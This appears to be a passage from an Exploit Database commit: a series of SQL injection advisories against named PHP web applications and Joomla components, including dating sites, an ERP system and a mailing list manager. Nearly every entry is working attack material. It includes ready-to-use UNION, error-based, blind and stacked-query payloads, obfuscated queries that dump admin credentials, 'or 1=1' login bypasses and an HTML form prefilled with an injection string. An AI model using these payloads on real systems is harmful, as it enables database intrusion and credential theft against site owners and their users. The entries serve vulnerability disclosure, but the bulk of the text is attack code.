# Software Link: https://www.codester.com/items/4908/arox-school-erp-php-script
|
||||
# Demo: http://erp1.arox.in/
|
||||
# Version: CVE-2017-15978
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: N/A
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/office_admin/?pid=95&action=print_charactercertificate&id=[SQL]
|
||||
# http://localhost/[PATH]/office_admin/?pid=95&action=edit&id=3[SQL]
|
||||
#
|
||||
# Parameter: id (GET)
|
||||
# Type: AND/OR time-based blind
|
||||
# Title: MySQL >= 5.0.12 AND time-based blind
|
||||
# Payload: pid=95&action=print_charactercertificate&id=3 AND SLEEP(5)
|
||||
#
|
||||
# Parameter: id (GET)
|
||||
# Type: AND/OR time-based blind
|
||||
# Title: MySQL >= 5.0.12 AND time-based blind
|
||||
# Payload: pid=95&action=edit&id=3 AND SLEEP(5)
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
46
platforms/php/webapps/43082.txt
Executable file
46
platforms/php/webapps/43082.txt
Executable file
|
@ -0,0 +1,46 @@
|
|||
<!--
|
||||
# # # # #
|
||||
# Exploit Title: Protected Links - Expiring Download Links - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 30.10.2017
|
||||
# Vendor Homepage: http://sixthlife.net/
|
||||
# Software Link: https://codecanyon.net/item/protected-links-expiring-download-links/2556861
|
||||
# Demo: http://protectedlinks.net/demo/
|
||||
# Version: N/A
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2017-15977
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/admin
|
||||
#
|
||||
# User: 'or 1=1 or ''=' Pass: anything
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
||||
-->
|
||||
<form name="login" method="post" action="http://localhost/[PATH]/index.php">
|
||||
<div id="login">
|
||||
<table width="200" border="0">
|
||||
<tr>
|
||||
<td height="45"><p>Username</p></td>
|
||||
<td><label for="textfield"></label>
|
||||
<input type="text" name="username" id="textfield" value="' UNION ALL SELECT 1,CONCAT(VERSiON(),0x494853414e2053454e43414e),3,4,CONCAT(0x494853414e2053454e43414e)-- Ver Ayari"/></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td height="45">Password</td>
|
||||
<td><label for="textfield"></label>
|
||||
<input type="password" name="password" id="textfield" value="Ver Ayari"/></td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
||||
<input type="submit" name="submit" value="LOGIN" />
|
||||
</form>
|
40
platforms/php/webapps/43083.txt
Executable file
40
platforms/php/webapps/43083.txt
Executable file
|
@ -0,0 +1,40 @@
|
|||
# # # # #
|
||||
# Exploit Title: ZeeBuddy 2x - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 30.10.2017
|
||||
# Vendor Homepage: http://www.zeescripts.com/
|
||||
# Software Link: http://www.zeebuddy.com/
|
||||
# Demo: http://www.zeebuddy.com/demo/
|
||||
# Version: 2x
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2017-15976
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/admin/editadgroup.php?groupid=[SQL]
|
||||
#
|
||||
# -1++/*!00009UNION*/+/*!00009SELECT*/+0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,(SELECT+GROUP_CONCAT(0x557365726e616d653a,name,0x3c62723e,0x50617373776f72643a,pwd+SEPARATOR+0x3c62723e)+FROM+admin)--+-
|
||||
#
|
||||
# Parameter: groupid (GET)
|
||||
# Type: boolean-based blind
|
||||
# Title: AND boolean-based blind - WHERE or HAVING clause
|
||||
# Payload: groupid=1 AND 3188=3188
|
||||
#
|
||||
# Type: AND/OR time-based blind
|
||||
# Title: MySQL >= 5.0.12 AND time-based blind
|
||||
# Payload: groupid=1 AND SLEEP(5)
|
||||
#
|
||||
# Type: UNION query
|
||||
# Title: Generic UNION query (NULL) - 9 columns
|
||||
# Payload: groupid=1 UNION ALL SELECT CONCAT(0x71707a7071,0x754642515970647855775a494a486368477a6e45755355495050634270466969495966676b78536c,0x7162767071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- oMUM
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
34
platforms/php/webapps/43084.txt
Executable file
34
platforms/php/webapps/43084.txt
Executable file
|
@ -0,0 +1,34 @@
|
|||
# # # # #
|
||||
# Exploit Title: Vastal I-Tech Dating Zone 0.9.9 - 'product_id' Parameter SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 30.10.2017
|
||||
# Vendor Homepage: http://vastal.com/
|
||||
# Software http://vastal.com/dating-zone-the-dating-software.html
|
||||
# Demo: http://datingzone.vastal.com/demo/
|
||||
# Version: 0.9.9
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2017-15975
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/add_to_cart.php?product_id=[SQL]
|
||||
#
|
||||
# Parameter: product_id (GET)
|
||||
# Type: error-based
|
||||
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
|
||||
# Payload: product_id=3 AND (SELECT 5917 FROM(SELECT COUNT(*),CONCAT(0x7176626a71,(SELECT (ELT(5917=5917,1))),0x71716b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
|
||||
#
|
||||
# Type: AND/OR time-based blind
|
||||
# Title: MySQL >= 5.0.12 AND time-based blind
|
||||
# Payload: product_id=3 AND SLEEP(5)
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
28
platforms/php/webapps/43085.txt
Executable file
28
platforms/php/webapps/43085.txt
Executable file
|
@ -0,0 +1,28 @@
|
|||
# # # # #
|
||||
# Exploit Title: tPanel 2009 - Authentication Bypass
|
||||
# Dork: N/A
|
||||
# Date: 30.10.2017
|
||||
# Vendor Homepage: http://www.datacomponents.net/
|
||||
# Software Link: http://www.datacomponents.net/products/hosting/tpanel/
|
||||
# Demo: http://demo.datacomponents.net/tpanel/
|
||||
# Version: 2009
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2017-15974
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
#
|
||||
# http://localhost/[PATH]/login.php
|
||||
#
|
||||
# User: 'or 1=1 or ''=' Pass: anything
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
44
platforms/php/webapps/43086.txt
Executable file
44
platforms/php/webapps/43086.txt
Executable file
|
@ -0,0 +1,44 @@
|
|||
# # # # #
|
||||
# Exploit Title: Sokial Social Network Script 1.0 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 30.10.2017
|
||||
# Vendor Homepage: http://www.sokial.net/
|
||||
# Software http://www.sokial.net/demonstrations-social-network.sk
|
||||
# Demo: http://demo.sokial.net/
|
||||
# Version: 1.0
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2017-15973
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/admin/members_view.php?id=[SQL]
|
||||
#
|
||||
# 2271+aND(/*!00033SelEcT*/+0x30783331+/*!00033frOM*/+(/*!00033SelEcT*/+cOUNT(*),/*!00033cOnCaT*/((/*!00033sELECT*/(/*!00033sELECT*/+/*!00033cOnCaT*/(cAST(dATABASE()+aS+/*!00033cHAR*/),0x7e,0x496873616E53656e63616e))+/*!00033FRoM*/+iNFORMATION_sCHEMA.tABLES+/*!00033wHERE*/+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(/*!00033rAND*/(0)*2))x+/*!00033FRoM*/+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+/*!00033aNd*/+1=1
|
||||
#
|
||||
# Parameter: id (GET)
|
||||
# Type: boolean-based blind
|
||||
# Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
|
||||
# Payload: id=2271 RLIKE (SELECT (CASE WHEN (8371=8371) THEN 2271 ELSE 0x28 END))
|
||||
#
|
||||
# Type: error-based
|
||||
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
|
||||
# Payload: id=2271 AND (SELECT 9357 FROM(SELECT COUNT(*),CONCAT(0x7176716a71,(SELECT (ELT(9357=9357,1))),0x717a6b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
|
||||
#
|
||||
# Type: stacked queries
|
||||
# Title: MySQL > 5.0.11 stacked queries (comment)
|
||||
# Payload: id=2271;SELECT SLEEP(5)#
|
||||
#
|
||||
# Type: AND/OR time-based blind
|
||||
# Title: MySQL >= 5.0.12 OR time-based blind
|
||||
# Payload: id=2271 OR SLEEP(5)
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
32
platforms/php/webapps/43087.txt
Executable file
32
platforms/php/webapps/43087.txt
Executable file
|
@ -0,0 +1,32 @@
|
|||
# # # # #
|
||||
# Exploit Title: SoftDatepro Dating Social Network 1.3 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 30.10.2017
|
||||
# Vendor Homepage: http://www.softdatepro.com/
|
||||
# Software Link: https://codecanyon.net/item/softdatepro-build-your-own-dating-social-network/3650044
|
||||
# Demo: http://demo.softdatepro.com/
|
||||
# Version: 1.3
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2017-15972
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/viewprofile.php?profid=[SQL]
|
||||
# http://localhost/[PATH]/viewmessage.php?sender_id=[SQL]
|
||||
#
|
||||
# -263'++/*!08888UNION*/+/*!08888ALL*/+/*!08888SELECT*/+0x31,0x32,(/*!08888SElEct*/+ExpOrt_sEt(5,@:=0,(/*!08888sElEct*/+cOunt(*)/*!08888frOm*/(infOrmatiOn_schEma.cOlumns)whErE@:=ExpOrt_sEt(5,ExpOrt_sEt(5,@,/*!08888tablE_namE*/,0x3c6c693E,2),/*!08888cOlumn_namE*/,0xa3a,2)),@,2)),0x34,0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136--+-
|
||||
#
|
||||
# http://localhost/[PATH]/admin
|
||||
#
|
||||
# Email: 'or 1=1 or ''=' Pass: anything
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
32
platforms/php/webapps/43088.txt
Executable file
32
platforms/php/webapps/43088.txt
Executable file
|
@ -0,0 +1,32 @@
|
|||
# # # # #
|
||||
# Exploit Title: Same Sex Dating Software Pro 1.0 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 30.10.2017
|
||||
# Vendor Homepage: http://www.softdatepro.com/
|
||||
# Software Link: https://codecanyon.net/item/same-date-pro-same-sex-dating-software/4530959
|
||||
# Demo: http://www.ss.softdatepro.com/
|
||||
# Version: 1.0
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2017-15971
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an users to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/viewprofile.php?profid=[SQL]
|
||||
# http://localhost/[PATH]/viewmessage.php?sender_id=[SQL]
|
||||
#
|
||||
# -263'++/*!08888UNION*/+/*!08888ALL*/+/*!08888SELECT*/+0x31,0x32,(/*!08888SElEct*/+ExpOrt_sEt(5,@:=0,(/*!08888sElEct*/+cOunt(*)/*!08888frOm*/(infOrmatiOn_schEma.cOlumns)whErE@:=ExpOrt_sEt(5,ExpOrt_sEt(5,@,/*!08888tablE_namE*/,0x3c6c693E,2),/*!08888cOlumn_namE*/,0xa3a,2)),@,2)),0x34,0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136--+-
|
||||
#
|
||||
# http://localhost/[PATH]/admin
|
||||
#
|
||||
# Email: 'or 1=1 or ''=' Pass: anything
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
34
platforms/php/webapps/43089.txt
Executable file
34
platforms/php/webapps/43089.txt
Executable file
|
@ -0,0 +1,34 @@
|
|||
# # # # #
|
||||
# Exploit Title: PHP CityPortal 2.0 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 30.10.2017
|
||||
# Vendor Homepage: http://www.phpcityportal.com/
|
||||
# Software Link: http://www.phpcityportal.com/index.php
|
||||
# Demo: http://phpcityportal.com/demo
|
||||
# Version: 2.0
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2017-15970
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/index.php?page=news&nid=[SQL]
|
||||
#
|
||||
# Parameter: cat (GET)
|
||||
# Type: boolean-based blind
|
||||
# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
|
||||
# Payload: cat=1' OR NOT 6616=6616#
|
||||
#
|
||||
# Type: AND/OR time-based blind
|
||||
# Title: MySQL >= 5.0.12 OR time-based blind
|
||||
# Payload: cat=1' OR SLEEP(5)-- cCQQ
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
107
platforms/php/webapps/43090.txt
Executable file
107
platforms/php/webapps/43090.txt
Executable file
|
@ -0,0 +1,107 @@
|
|||
# # # # #
|
||||
# Exploit Title: PG All Share Video 1.0 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 30.10.2017
|
||||
# Vendor Homepage: http://www.pilotgroup.net/
|
||||
# Software Link: http://www.allsharevideo.com/features.php
|
||||
# Demo: http://demo.allsharevideo.com/
|
||||
# Version: 1.0
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2017-15969
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/search/tag/[SQL]
|
||||
# http://localhost/[PATH]/friends/index/1[SQL]
|
||||
# http://localhost/[PATH]/users/profile/1[SQL]
|
||||
# http://localhost/[PATH]/video_catalog/category/1[SQL]
|
||||
#
|
||||
# 'ANd(/*!06666seleCt+*/1/*!06666frOm*/(/*!06666seleCt*/%20COunt(*),/*!06666COnCAt*/((seleCt(seleCt+COnCAt(CAst(dAtAbAse()As%20ChAr),0x7e,0x496873616E53656e63616e))%20frOm%20infOrmAtiOn_sChemA.tAbles%20where%20tAble_sChemA=dAtAbAse()%20limit%200,1),flOOr(rAnd(0)*2))x%20frOm%20infOrmAtiOn_sChemA.tAbles%20grOup%20by%20x)A)%20AnD%20''='
|
||||
#
|
||||
# Parameter: #1* (URI)
|
||||
# Type: boolean-based blind
|
||||
# Title: AND boolean-based blind - WHERE or HAVING clause
|
||||
# Payload: http://localhost/[PATH]/search/tag/VerAyari' AND 2686=2686 AND 'UsmZ'='UsmZ
|
||||
#
|
||||
# Type: error-based
|
||||
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
|
||||
# Payload: http://localhost/[PATH]/search/tag/VerAyari' AND (SELECT 4572 FROM(SELECT COUNT(*),CONCAT(0x71717a6a71,(SELECT (ELT(4572=4572,1))),0x716b627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'iudq'='iudq
|
||||
#
|
||||
# Type: AND/OR time-based blind
|
||||
# Title: MySQL >= 5.0.12 AND time-based blind
|
||||
# Payload: http://localhost/[PATH]/search/tag/VerAyari' AND SLEEP(5) AND 'iczN'='iczN
|
||||
#
|
||||
# Type: UNION query
|
||||
# Title: Generic UNION query (NULL) - 3 columns
|
||||
# Payload: http://localhost/[PATH]/search/tag/VerAyari' UNION ALL SELECT NULL,NULL,CONCAT(0x71717a6a71,0x4b6e4a524653614e47727a4f4464575253424c4d6c544f6b6a78454e4a756c75794d6a7765697269,0x716b627871)-- mAFc
|
||||
#
|
||||
# Parameter: #1* (URI)
|
||||
# Type: boolean-based blind
|
||||
# Title: AND boolean-based blind - WHERE or HAVING clause
|
||||
# Payload: http://localhost/[PATH]/channels/category/7' AND 4239=4239 AND 'oXBo'='oXBo
|
||||
#
|
||||
# Type: error-based
|
||||
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
|
||||
# Payload: http://localhost/[PATH]/channels/category/7' AND (SELECT 4458 FROM(SELECT COUNT(*),CONCAT(0x7170626b71,(SELECT (ELT(4458=4458,1))),0x7176787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'JBxT'='JBxT
|
||||
#
|
||||
# Type: UNION query
|
||||
# Title: Generic UNION query (NULL) - 3 columns
|
||||
# Payload: http://localhost/[PATH]/channels/category/7' UNION ALL SELECT NULL,NULL,CONCAT(0x7170626b71,0x574355636a666d516c4d437a78696a5a6243555a46486f494a45455a6c49574e577765704a496367,0x7176787071)-- kJpu
|
||||
#
|
||||
# Parameter: #1* (URI)
|
||||
# Type: boolean-based blind
|
||||
# Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
|
||||
# Payload: http://localhost/[PATH]/friends/index/11' RLIKE (SELECT (CASE WHEN (2135=2135) THEN 11 ELSE 0x28 END))-- SVFb
|
||||
#
|
||||
# Type: error-based
|
||||
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
|
||||
# Payload: http://localhost/[PATH]/friends/index/11' AND (SELECT 1564 FROM(SELECT COUNT(*),CONCAT(0x7170786a71,(SELECT (ELT(1564=1564,1))),0x716a717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- DoZE
|
||||
#
|
||||
# Type: AND/OR time-based blind
|
||||
# Title: MySQL >= 5.0.12 OR time-based blind
|
||||
# Payload: http://localhost/[PATH]/friends/index/11' OR SLEEP(5)-- Maum
|
||||
#
|
||||
# Parameter: #1* (URI)
|
||||
# Type: boolean-based blind
|
||||
# Title: AND boolean-based blind - WHERE or HAVING clause
|
||||
# Payload: http://localhost/[PATH]/users/profile/1' AND 3612=3612 AND 'wNwI'='wNwI
|
||||
#
|
||||
# Type: error-based
|
||||
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
|
||||
# Payload: http://localhost/[PATH]/users/profile/1' AND (SELECT 3555 FROM(SELECT COUNT(*),CONCAT(0x716a767671,(SELECT (ELT(3555=3555,1))),0x717a7a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'XrEj'='XrEj
|
||||
#
|
||||
# Type: AND/OR time-based blind
|
||||
# Title: MySQL >= 5.0.12 AND time-based blind
|
||||
# Payload: http://localhost/[PATH]/users/profile/1' AND SLEEP(5) AND 'XZVf'='XZVf
|
||||
#
|
||||
# Type: UNION query
|
||||
# Title: Generic UNION query (NULL) - 3 columns
|
||||
# Payload: http://localhost/[PATH]/users/profile/1' UNION ALL SELECT NULL,NULL,CONCAT(0x716a767671,0x7a7a646e536849756f717771546e4547497549465459754f65636946535375667577596755616876,0x717a7a7a71)-- UaUA
|
||||
#
|
||||
# Parameter: #1* (URI)
|
||||
# Type: boolean-based blind
|
||||
# Title: AND boolean-based blind - WHERE or HAVING clause
|
||||
# Payload: http://localhost/[PATH]/video_catalog/category/1' AND 4550=4550 AND 'SAmI'='SAmI
|
||||
#
|
||||
# Type: error-based
|
||||
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
|
||||
# Payload: http://localhost/[PATH]/video_catalog/category/1' AND (SELECT 4089 FROM(SELECT COUNT(*),CONCAT(0x716a6a7171,(SELECT (ELT(4089=4089,1))),0x716b786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'PTze'='PTze
|
||||
#
|
||||
# Type: AND/OR time-based blind
|
||||
# Title: MySQL >= 5.0.12 AND time-based blind
|
||||
# Payload: http://localhost/[PATH]/video_catalog/category/1' AND SLEEP(5) AND 'ptLy'='ptLy
|
||||
#
|
||||
# Type: UNION query
|
||||
# Title: Generic UNION query (NULL) - 3 columns
|
||||
# Payload: http://localhost/[PATH]/video_catalog/category/1' UNION ALL SELECT NULL,NULL,CONCAT(0x716a6a7171,0x4c5a694b4948566c59527663484b7a466c76725746684863506159646973414749617966634d5145,0x716b786a71)-- zDQK
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
40
platforms/php/webapps/43091.txt
Executable file
40
platforms/php/webapps/43091.txt
Executable file
|
@ -0,0 +1,40 @@
|
|||
# # # # #
|
||||
# Exploit Title: MyBuilder Clone 1.0 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 30.10.2017
|
||||
# Vendor Homepage: http://www.contractorscripts.com/
|
||||
# Software Link: http://order.contractorscripts.com/
|
||||
# Demo: http://demo.contractorscripts.com/
|
||||
# Version: 1.0
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2017-15968
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/phpsqlsearch_genxml.php?subcategory=[SQL]
|
||||
#
|
||||
# 1'++aND(/*!09999sELeCT*/+0x30783331+/*!09999FrOM*/+(/*!09999SeLeCT*/+cOUNT(*),/*!09999CoNCaT*/((sELEcT(sELECT+/*!09999CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a) AND ''='
|
||||
#
|
||||
# Parameter: subcategory (GET)
|
||||
# Type: boolean-based blind
|
||||
# Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
|
||||
# Payload: subcategory=1' RLIKE (SELECT (CASE WHEN (9811=9811) THEN 1 ELSE 0x28 END))-- gzxz
|
||||
#
|
||||
# Type: error-based
|
||||
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
|
||||
# Payload: subcategory=1' AND (SELECT 1213 FROM(SELECT COUNT(*),CONCAT(0x7162626a71,(SELECT (ELT(1213=1213,1))),0x716b6a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- qHTp
|
||||
#
|
||||
# Type: AND/OR time-based blind
|
||||
# Title: MySQL >= 5.0.12 OR time-based blind
|
||||
# Payload: subcategory=1' OR SLEEP(5)-- RvzR
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
29
platforms/php/webapps/43092.txt
Executable file
29
platforms/php/webapps/43092.txt
Executable file
|
@ -0,0 +1,29 @@
|
|||
# # # # #
|
||||
# Exploit Title: Mailing List Manager Pro 3.0 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 30.10.2017
|
||||
# Vendor Homepage: http://www.vote-pro.com/
|
||||
# Software Link: http://www.mailing-manager.com/demo.html
|
||||
# Demo: http://www.mailing-manager.com/demo-gold/
|
||||
# Version: 3.0
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2017-15967
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an users to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/admin/users/?sort=login&edit=[SQL]
|
||||
#
|
||||
# -2'++/*!03333UNION*/(/*!03333SELECT*/0x283129,0x283229,0x283329,/*!03333CONCAT_WS*/(0x203a20,USER()),0x283529,/*!03333CONCAT_WS*/(0x203a20,DATABASE()),/*!03333CONCAT_WS*/(0x203a20,VERSION()),0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429)--+-
|
||||
#
|
||||
# http://localhost/[PATH]/admin/template/?edit=[SQL]
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
34
platforms/php/webapps/43093.txt
Executable file
34
platforms/php/webapps/43093.txt
Executable file
|
@ -0,0 +1,34 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component Zh YandexMap 6.1.1.0 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 30.10.2017
|
||||
# Vendor Homepage: http://zhuk.cc/
|
||||
# Software Link: https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/zh-yandexmap/
|
||||
# Demo: http://joomla.zhuk.cc/index.php
|
||||
# Version: 6.1.1.0
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2017-15966
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/index.php?option=com_zhyandexmap&view=zhyandexmap&tmpl=component&id=3&placemarklistid=[SQL]
|
||||
#
|
||||
# Parameter: placemarklistid (GET)
|
||||
# Type: boolean-based blind
|
||||
# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
|
||||
# Payload: option=com_zhyandexmap&view=zhyandexmap&tmpl=component&id=3&placemarklistid=-8164) OR 5013=5013#
|
||||
#
|
||||
# Type: error-based
|
||||
# Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
|
||||
# Payload: option=com_zhyandexmap&view=zhyandexmap&tmpl=component&id=3&placemarklistid=-1660) OR 1 GROUP BY CONCAT(0x71627a7871,(SELECT (CASE WHEN (6691=6691) THEN 1 ELSE 0 END)),0x716b7a7671,FLOOR(RAND(0)*2)) HAVING MIN(0)#
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
34
platforms/php/webapps/43094.txt
Executable file
34
platforms/php/webapps/43094.txt
Executable file
|
@ -0,0 +1,34 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component NS Download Shop 2.2.6 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 30.10.2017
|
||||
# Vendor Homepage: https://nswd.co/
|
||||
# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/paid-downloads/ns-downloadshop/
|
||||
# Demo: https://ds.nswd.co/
|
